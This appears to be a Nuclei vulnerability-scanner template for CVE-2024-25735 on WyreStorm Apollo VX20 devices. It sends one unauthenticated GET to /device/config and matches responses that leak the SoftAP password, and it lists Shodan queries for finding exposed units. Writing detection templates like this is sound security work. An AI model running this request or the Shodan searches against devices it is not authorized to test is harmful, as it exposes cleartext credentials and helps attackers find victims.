49 lines
1.5 KiB
YAML
49 lines
1.5 KiB
YAML
id: CVE-2024-25735
|
|
|
|
info:
|
|
name: WyreStorm Apollo VX20 - Information Disclosure
|
|
author: johnk3r
|
|
severity: high
|
|
description: |
|
|
An issue was discovered on WyreStorm Apollo VX20 devices before 1.3.58. Remote attackers can discover cleartext credentials for the SoftAP (access point) Router /device/config using an HTTP GET request.
|
|
reference:
|
|
- https://hyp3rlinx.altervista.org/advisories/WYRESTORM_APOLLO_VX20_INCORRECT_ACCESS_CONTROL_CREDENTIALS_DISCLOSURE_CVE-2024-25735.txt
|
|
- https://packetstormsecurity.com/files/cve/CVE-2024-25735
|
|
- http://packetstormsecurity.com/files/177082
|
|
- https://hyp3rlinx.altervista.org
|
|
- https://github.com/codeb0ss/CVE-2024-25735-PoC
|
|
classification:
|
|
epss-score: 0.00381
|
|
epss-percentile: 0.72907
|
|
metadata:
|
|
verified: true
|
|
max-request: 1
|
|
vendor: wyrestorm
|
|
product: apollo vx20
|
|
shodan-query:
|
|
- ssl:"WyreStorm Apollo VX20"
|
|
- ssl:"wyrestorm apollo vx20"
|
|
tags: packetstorm,cve,cve2024,wyrestorm,info-leak
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/device/config"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
words:
|
|
- '"password":'
|
|
- '"softAp":'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 4a0a0047304502210089ae34c1356c7a3fcbe4fd3f863ccf350a6212f8f027d22935fd77435e6f3cb002201dbc01d34ec78fdc6c513b82ba17a53b6508a1d3e3bf07cd4c8e6d4989454a5d:922c64590222798bb761d5b6d8e72950 |